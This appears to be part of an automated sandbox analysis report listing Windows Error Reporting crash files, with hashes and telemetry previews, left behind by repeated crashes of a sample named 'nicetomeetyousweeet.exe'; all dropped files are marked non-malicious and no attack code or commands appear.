                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):65536
                                                                            Entropy (8bit):0.8704205379516736
                                                                            Encrypted:false
                                                                            SSDEEP:192:gDbJ8c3B056rxf6js2ZrozuiFpZ24IO824i:UucS56rQjuzuiFpY4IO8M
                                                                            MD5:14214BF8D9D810D522162808DE3AF900
                                                                            SHA1:F733CCD1C81F38F581A1CCAF7F0C10FD9CA165DA
                                                                            SHA-256:2D89B8924579684D8D3466E3FBA1FA34536D3E5AAA9442EACCCA99186F182DDC
                                                                            SHA-512:14BEB2586A9C03CECC683AF56233433CD76185B1A987A020A71CC66C70AC0D3BE33E6687FF1E48DFB7CA67F178F6AE303E112269A87F1AE5D80E6E39B2323F23
                                                                            Malicious:false
                                                                             Preview:Version=1 EventType=BEX EventTime=133788402344857447 ReportType=2 Consent=1 ReportIdentifier=4d4a7982-530f-4f43-8adb-2f09a165a94a IntegratorReportIdentifier=2ac4e77e-5849-4a30-bab8-17b0d503d1d0 Wow64Host=34404 Wow64Guest=332 NsAppName=nicetomeetyousweeet.exe AppSessionGuid=00001bb0-0001-0014-9b8a-f9d3d74fdb01 TargetAppId=W:0006a5c37a0d05504c0f20e4cd9f901b641e0000ffff!0000ce4c380f2748f375904c17b38d4f93e294fef4f6!nicetomeetyousweeet.exe TargetAppVer=2024//11//01:08:29:31!0!nicetomeety
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):65536
                                                                            Entropy (8bit):0.9047414061645268
                                                                            Encrypted:false
                                                                            SSDEEP:192:LZDbJ8g3B056rxf6js2ZrprzuiFpZ24IO824i:LNugS56rQjTzuiFpY4IO8M
                                                                            MD5:C74E688A2FA4A7625EAAD58EA908FD7B
                                                                            SHA1:F896125F792A7D9D755E068900F726C192F99EA8
                                                                            SHA-256:09A9F994DAC9095C6A11D67A1520457E9A410E7B750723530380221EDF7D5724
                                                                            SHA-512:FD88F83C5ADA95FF9D1D35A375EEEC64A71AACB5C644CDBB424A123DE4D14E5872D325256274E7E96C9DDC8F1D2039335BC07A7E5A22008EA8190CBCD509E491
                                                                            Malicious:false
                                                                             Preview:Version=1 EventType=BEX EventTime=133788402415634666 ReportType=2 Consent=1 ReportIdentifier=54de7915-d0e8-4834-bce6-b8d1dfb043f3 IntegratorReportIdentifier=bc28d0d8-5ba4-4abe-9e09-e177b1aaf716 Wow64Host=34404 Wow64Guest=332 NsAppName=nicetomeetyousweeet.exe AppSessionGuid=00001bb0-0001-0014-9b8a-f9d3d74fdb01 TargetAppId=W:0006a5c37a0d05504c0f20e4cd9f901b641e0000ffff!0000ce4c380f2748f375904c17b38d4f93e294fef4f6!nicetomeetyousweeet.exe TargetAppVer=2024//11//01:08:29:31!0!nicetomeety
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):65536
                                                                            Entropy (8bit):0.9044091073352927
                                                                            Encrypted:false
                                                                            SSDEEP:192:QaUDbJ843B056rxf6js2ZrprzuiFpZ24IO824i:3Au4S56rQjTzuiFpY4IO8M
                                                                            MD5:09476EC30094ECB526D2C9A2FB10A69B
                                                                            SHA1:318EACB53B84EC002D1BD1E825761E5D32ED5DEE
                                                                            SHA-256:8836167F617A074D5EA0DE4B65E21DD6F15ECE28B2403BC5889F57F731EEFEAA
                                                                            SHA-512:6EA7D1F80E404405C570D7745A68187003EED1FD87209D8BA2036F4535E5A8389BD7867EA848B685F1766DA0EC0D4B32DA509F6889001B9D56B77BDEC9505C92
                                                                            Malicious:false
                                                                             Preview:Version=1 EventType=BEX EventTime=133788402384790958 ReportType=2 Consent=1 ReportIdentifier=6da32c7b-08cc-46cc-ab60-19b53caeade2 IntegratorReportIdentifier=c24eba21-bb5b-4401-9936-9a25ab20eeb6 Wow64Host=34404 Wow64Guest=332 NsAppName=nicetomeetyousweeet.exe AppSessionGuid=00001bb0-0001-0014-9b8a-f9d3d74fdb01 TargetAppId=W:0006a5c37a0d05504c0f20e4cd9f901b641e0000ffff!0000ce4c380f2748f375904c17b38d4f93e294fef4f6!nicetomeetyousweeet.exe TargetAppVer=2024//11//01:08:29:31!0!nicetomeety
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):65536
                                                                            Entropy (8bit):0.9049477793509392
                                                                            Encrypted:false
                                                                            SSDEEP:192:ONDbJ8G3B056rxf6js2ZrprzuiFpZ24IO824i:wuGS56rQjTzuiFpY4IO8M
                                                                            MD5:415B3B42CC9BB3E567181BA555C79F56
                                                                            SHA1:42AF1F58506547D09D2E3F3C9E3087D009DAC995
                                                                            SHA-256:B6D625958177C00FAAAC3EECD9A683D507D96FBBB19DDE1B594D9265DFF52ACD
                                                                            SHA-512:48C6FE74CD875A668B7716ED84CFA1893C2C382129281AB22D7CBC32445CB06DB5AFED5288EF05EE77A696D509A97E606BDB72B3240DDAB2E0C087AA671D1CDC
                                                                            Malicious:false
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):65536
                                                                            Entropy (8bit):0.9051100550468161
                                                                            Encrypted:false
                                                                            SSDEEP:192:6jDbJ8O3B056rxf6js2ZrprzuiFpZ24IO824i:SuOS56rQjTzuiFpY4IO8M
                                                                            MD5:A69E6EEB1C8D72A1C0A93F97433D9CC3
                                                                            SHA1:F219BDF26EE264AB28FA008F4D0A8FD4E2C4F4EC
                                                                            SHA-256:AE70EB62CD58F12CE748EA682703BBF374952BDF45AAE943660C64A869D95043
                                                                            SHA-512:A69F8612BDAD12D74BB51E48FFAE52B68C60402DC02DDA35CD26C71121F082BA3F000BE31C4D78C56F4A39FDBCE7F19182E3FE14E026A851AB3B48B5047C0966
                                                                            Malicious:false
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):6430
                                                                            Entropy (8bit):3.7165706584366283
                                                                            Encrypted:false
                                                                            SSDEEP:192:R6l7wVeJVBD6Us+uYUMaAjAbpBa89bk5sfwsm:R6lXJn6Us3YdaAjAHkSf6
                                                                            MD5:D57B642A782F609471A78D2707608F10
                                                                            SHA1:62242A003CA885FEC10FED0298D21D7D044B3A99
                                                                            SHA-256:5BD9BD06BCD305392D48D6937EA933DCFAA58A39734E78410E9415650E339952
                                                                            SHA-512:39AE1003A3484B1B9FF3FE925F1C977D4E6F4CBD425DAE60EE46BF2C63A90A9FD35D32EBFA51ED4CE7D6A4D14CC4FD666E5EDCB144CC15937AB0F3124F553701
                                                                            Malicious:false
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):4765
                                                                            Entropy (8bit):4.487742642654443
                                                                            Encrypted:false
                                                                            SSDEEP:48:cvIwWl8zsZJg77aI9wjLWpW8VYWPYm8M4JKTBFsF+q8v+TGh0B9ned:uIjfrI7Cj67VuJfKt0B9ned
                                                                            MD5:0832EEB497B8073E610125D6A8C66599
                                                                            SHA1:BD47834D89268AC3B3A4575C1DF0983AEC643F3E
                                                                            SHA-256:C954D1B08AA90F5A8DD0B47A2EF4127B71C400A931FA13B681B9F3F1FDCD1AE2
                                                                            SHA-512:5C3E0A0E8262512C1E648AE15374AA8E0DED0174A92015982D57FA3532CD4C148E12F9F3E53837D667D44695B90976CEB0CB68F8EB4B3B47EDDC36C32DE48887
                                                                            Malicious:false
                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="634053" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Dec 16 16:30:48 2024, 0x1205a4 type
                                                                            Category:dropped
                                                                            Size (bytes):64180
                                                                            Entropy (8bit):2.2516145293550895
                                                                            Encrypted:false
                                                                            SSDEEP:192:MNyuX6tlLXFkltG8rmO2gtgyEyWZChsSEh796B/MM25vAaklr+1XLY3hyCHW76y7:wynlBklt9hgrlChsSE5W/6oa9mumg
                                                                            MD5:7D601601B6766EEB470B68354DEF630E
                                                                            SHA1:2F2268BCFCE4FF7ECF4B5F7FAE7609617B92112F
                                                                            SHA-256:182243476C138311569815750F8E6F4F976FC85E8130CA0DE54A4587E173B0B0
                                                                            SHA-512:E7D2C1B4F1FE756FA06EDCFC289A294936C7894A9D2EC1C3E3AB9B66D73ABF1E77E95DA50EA6D13127448A96E44BF1F5EEC9841EFACE2AF6778146B5447C5DB5
                                                                            Malicious:false
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):6430
                                                                            Entropy (8bit):3.7169480396323014
                                                                            Encrypted:false
                                                                            SSDEEP:192:R6l7wVeJVBp6Fs5dYUc0pB089bq5sf4um:R6lXJN6FsDYNiqSfo
                                                                            MD5:58BAAEFFA381D7155D5B4F7B694A3D75
                                                                            SHA1:8B8A9583181159FF735912C56DCBFA6EE3E6EC90
                                                                            SHA-256:7277B98FD50052988BF79916710D5816EC96F5A6764FBC33A867408222417229
                                                                            SHA-512:7A375570D4EEFF074E2E28F61ED62482B57C6CB599EB3331611A15EEDAF3579CC241974793A206AB1863425FE404F1C646C8B70B07029EFDE375CFA709F00C58
                                                                            Malicious:false
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):4765
                                                                            Entropy (8bit):4.487707061698159
                                                                            Encrypted:false
                                                                            SSDEEP:48:cvIwWl8zsZJg77aI9wjLWpW8VYkvYm8M4JKTJFg+q8v+Tuh0B9ned:uIjfrI7Cj67VryJVKF0B9ned
                                                                            MD5:B616FA9DCF303D857270308BAA1D9185
                                                                            SHA1:6D1392A67F2561F06CE3B6EB896F00793391BB08
                                                                            SHA-256:3C05726442FFF1AC426CB928C2F3A6F8EDCB873C465D44D890C9789F22BBD07D
                                                                            SHA-512:ED5604184F9294702752D5452255A94FBA8E8A56CC88B82C54C029E824366C9D2D778198A890484E3F2443EC12D50C97A97355F6BEFEAAB23FCA08CEAE8C680A
                                                                            Malicious:false
                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="634053" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Dec 16 16:30:50 2024, 0x1205a4 type
                                                                            Category:dropped
                                                                            Size (bytes):62814
                                                                            Entropy (8bit):2.2405272622817622
                                                                            Encrypted:false
                                                                            SSDEEP:192:qSyuX6tlLXFkltDbgmO2gtg+XBtWOsM1FwXuBkGn2bDaklr+1XLY3hyCHW76Y+C1:JynlBkltDwhgcBxsMw0kRa9m2BNSm
                                                                            MD5:06AA2FFDF75A6895F0E4C97C099E3050
                                                                            SHA1:6B83DB74B7655C52E99D5BDE8C69653CC0C618FD
                                                                            SHA-256:BB4C16992755B7EB7A5B4C1184FE2992EB94475D6C455652561C495FC23ADF0D
                                                                            SHA-512:DF8A9B4B7B00C255D9CD8B01B1D6CD0A3C21F0725144CE9288D71506C1829CF6DE39820C8CEDF478F4887465DF99E8366A019AC94A5DEAE5C6F287F77C0AA624
                                                                            Malicious:false
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):6430
                                                                            Entropy (8bit):3.7168925764724694
                                                                            Encrypted:false
                                                                            SSDEEP:192:R6l7wVeJVBp6lszdYUMaAjAbpBM89bj5sfJBm:R6lXJN6lsJYdaAjA9jSfu
                                                                            MD5:90B9979FD08A455F162EE4C4C8530D09
                                                                            SHA1:005A12764ED557D7F9F27241CD007F67EE62FF70
                                                                            SHA-256:2A14CFF6CD955776B1BD4A2AD889D9795160116400D677049D5142EC2DE87CE7
                                                                            SHA-512:2AD7F3D9356D64B02354A96190B4757E590789D84017E53BDD35844969C3F15EE3555A40CC7FFE443E47E88CF582D113EE4C77AF9958A56676D7B387B99C3DF9
                                                                            Malicious:false
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):4765
                                                                            Entropy (8bit):4.483899486284476
                                                                            Encrypted:false
                                                                            SSDEEP:48:cvIwWl8zsZJg77aI9wjLWpW8VYaYm8M4JKTBFM+q8v+TGh0B9ned:uIjfrI7Cj67VOJdKt0B9ned
                                                                            MD5:8964194B1E8C38F30B719AA7B47EC401
                                                                            SHA1:A201BD30FF2ACBB46D873A2FBFA41CB3418C616D
                                                                            SHA-256:050B7E1B5468A6A30159FE289423DB5DBBE267DB941217096F37E05E4A6F4A40
                                                                            SHA-512:27E34085B20906B32592A9DBB259C2F07A5A0ADF77637F32DAE0E580568A53F8907D9AEB2AD870B90B38034A25061D84EEC8D4D404DAAEEC7127F3A208E26120
                                                                            Malicious:false
                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="634053" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Dec 16 16:30:51 2024, 0x1205a4 type
                                                                            Category:dropped
                                                                            Size (bytes):64278
                                                                            Entropy (8bit):2.252791106750497
                                                                            Encrypted:false
                                                                            SSDEEP:192:z1QFyuX6tlLXFkltPjhmO2gtgWEyW9ihsSEPL9qB1xiMO2RyqDaklr+1XLY3hyCt:+ynlBkltPThgXBihsSEDG1ksa9m9GGe
                                                                            MD5:9138A4847919302FE54C3B84FAFC6776
                                                                            SHA1:E1B559860CA7FAF2BDAC700345757217751347B9
                                                                            SHA-256:F8E88EE9BCFA7A1267F04F5D415F12477D481428F9B896A62710D36C3A9A5E02
                                                                            SHA-512:E1E0E334B14251295B00C57168451D39B0A4A49A1BF1813AFC21EE65CEB2AC3C7714106FFCD2E30BF899E136BCB2E3A6D89541F9721D7C754516D86B80222165
                                                                            Malicious:false
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):6430
                                                                            Entropy (8bit):3.7179689147342896
                                                                            Encrypted:false
                                                                            SSDEEP:192:R6l7wVeJVBk6EsQrYUc0pB389ba5sf3+m:R6lXJA6EssYNraSf3
                                                                            MD5:FB9BEF18E2E13C198A17069A5EA5A42E
                                                                            SHA1:26BD0C284949DDAC8B196DED7F822E5E7F1BEA76
                                                                            SHA-256:528E469D38727479E099C26664009479842B6F861E9820475144C5898CCDDB90
                                                                            SHA-512:AFEABF2195CD748E320D54D9E7987487F8998A2ED541231D7C5E8385CF16CC6C78BD29A0706BC3595703517508C441E268C3C3D09C401B81B35FA9CDA8C65BBD
                                                                            Malicious:false
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):4765
                                                                            Entropy (8bit):4.4872225206833
                                                                            Encrypted:false
                                                                            SSDEEP:48:cvIwWl8zsZJg77aI9wjLWpW8VYZYm8M4JKTJFbM+q8v+Tuh0B9ned:uIjfrI7Cj67VFJqMKF0B9ned
                                                                            MD5:1C22B6CF63833F92178DAB9A3013EDAC
                                                                            SHA1:7C12487F744ED0796F85FF222A84648D3B9A6139
                                                                            SHA-256:61740C1CFDF0B6AE69CF07656094680576231E7C9B039D69AC45784CAFBBF251
                                                                            SHA-512:93E53F71B4D250782A1DEC1B078A0D07708E7ED0FA92DE57DBAC0424016753024270E1857A065CBC75DF53B86192C524BCEA313A6B73C4514DE0EAD563E59BBA
                                                                            Malicious:false
                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="634053" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Dec 16 16:30:53 2024, 0x1205a4 type
                                                                            Category:dropped
                                                                            Size (bytes):62912
                                                                            Entropy (8bit):2.2421321966273573
                                                                            Encrypted:false
                                                                            SSDEEP:192:Rs3QyuX6tlLXFkltJIJmO2gtg+XEtW0VsOFFwGuBtHiM12bDaklr+1XLY3hyCHWG:7ynlBkltJUhgcE7Vsiwttua9m5HIF9m
                                                                            MD5:1B8CA42874D58D1021E7DCF7810578F5
                                                                            SHA1:C8E045617B6A57B2151E65B80A4720BB4900F955
                                                                            SHA-256:7E812A091B8CC78E65D3719248012375D96BB0C589B07984C220B32477613FD6
                                                                            SHA-512:CA6D92AB3E1EA4CE51F7B311B6E776FA07448CFC0B930609D19936AAA0D83BF501DB5774AB5FCC8256461509568770511623A4EEB72FA77639D30F729967BDCB
                                                                            Malicious:false
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):6430
                                                                            Entropy (8bit):3.716334020844339
                                                                            Encrypted:false
                                                                            SSDEEP:192:R6l7wVeJVBS6RsarYUMaAjAbpBa89bo5sfVmjYm:R6lXJ26RsGYdaAjAHoSfwp
                                                                            MD5:C9905BB4B794B3E7E0E78DBDA688845B
                                                                            SHA1:71B9BDA1FAC7EFABE0EA4204C580FEA22B752910
                                                                            SHA-256:80FABD84455679EB7D655F959C3F5A633BA6A8FFB5CDBFEFB5DF30D3D436FB19
                                                                            SHA-512:8457B4608AEDA35334D50E2EC32441663F4E99CAF4BC06618CF96C1102EF6A2F577547F56F5C5BB4FFA159707CE4E09A0A3BA34855343A5DAE68E0C59905356A
                                                                            Malicious:false
                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.8.8.<./.P.i.
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):4765
                                                                            Entropy (8bit):4.485801096643135
                                                                            Encrypted:false
                                                                            SSDEEP:48:cvIwWl8zsZJg77aI9wjLWpW8VYDYm8M4JKTBFL+q8v+TGh0B9ned:uIjfrI7Cj67VXJWKt0B9ned
                                                                            MD5:4FBA274419D3BFED0245C8A4E742177F
                                                                            SHA1:C337DF5844A7D55C3CBD5384D01ADD982708E5E2
                                                                            SHA-256:D6BBBA1BFC3E595C1FEDD3EB52800D37C7B55629115237E748ECA06BBF15546F
                                                                            SHA-512:42AD4F9EDB80099FD1FCBC69D687383E7BFBD181A8A64902B23868BF7414F5E127EB241ABBC472F03A6FB6B472FD312599CE66F2455AB625EA5906B539F90B91
                                                                            Malicious:false
                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="634053" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Dec 16 16:30:54 2024, 0x1205a4 type
                                                                            Category:dropped
                                                                            Size (bytes):64376
                                                                            Entropy (8bit):2.2541171087474567
                                                                            Encrypted:false
                                                                            SSDEEP:192:WjyuX6tlLXFkltpetmO2gtg5yWABN+2vsFRvqDaklr+1XLY3hyCHW769/7gZ6ReY:IynlBkltpKhg5+NHsfvsa9mMZe
                                                                            MD5:DCC9304A3685A9D2455DCD4B3B869D06
                                                                            SHA1:60C1ACF6A8C1BF47B9CD6BD5E8EBD1F9BE6B93F3
                                                                            SHA-256:C172697BFBAB42988D6B10F31EDA3D6CDDB2BB1B6350920C8AE5B4F992CC5339
                                                                            SHA-512:84B673114768FE5C3DBA87FEF980003D92D18166D0AC33FEC8C9D11051F9DD2D3CB601E3CE534BC41F9ED3856751DC2B19ACACEB615FC73C04B26D3A8EA5B7D2
                                                                            Malicious:false
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):6430
                                                                            Entropy (8bit):3.7180022568204136
                                                                            Encrypted:false
                                                                            SSDEEP:192:R6l7wVeJVBY67J8YUc0pB089bH5sfAG2Nm:R6lXJ867J8YNiHSfjd
                                                                            MD5:46DE90D96E677F92DB7898F949C5ED00
                                                                            SHA1:0A2B691B5B5081C6105C5FAC52594BA5D5C2C0D2
                                                                            SHA-256:3C36B5B0076A34FF5DFA39A3FFFE0C2ABE16FC1AF877840BB198151681D90B13
                                                                            SHA-512:8DC9C03AB40BE95E416AACD47FBDEAAC84730D9707E41F5EB72E966B61100151F396171B6B0AD44CF7BE8797E52C8B84DFEA8FDF08B55F7DAD861333ED32C5E8
                                                                            Malicious:false
                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.8.8.<./.P.i.
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):4765
                                                                            Entropy (8bit):4.488099532871176
                                                                            Encrypted:false
                                                                            SSDEEP:48:cvIwWl8zsZJg77aI9wjLWpW8VYuYm8M4JKTJFCto+q8v+Tuh0B9ned:uIjfrI7Cj67V2JNoKF0B9ned
                                                                            MD5:CA2DBDA4377D9248C028C3C1DD5C648E
                                                                            SHA1:4C0457E663CEC8BBA5CEC675B68230B828CBD90A
                                                                            SHA-256:9A41AA9589368DC789EE02322DF58275AEA73D07E3DE589051C9EE7E7BC98DF5
                                                                            SHA-512:8F20789362D0B1E1D12992E4079221DB48309B69E020F717895A128F336CA43828A3840254126C57C6408628AAD63963492D4447BF88B666B95329880369D065
                                                                            Malicious:false
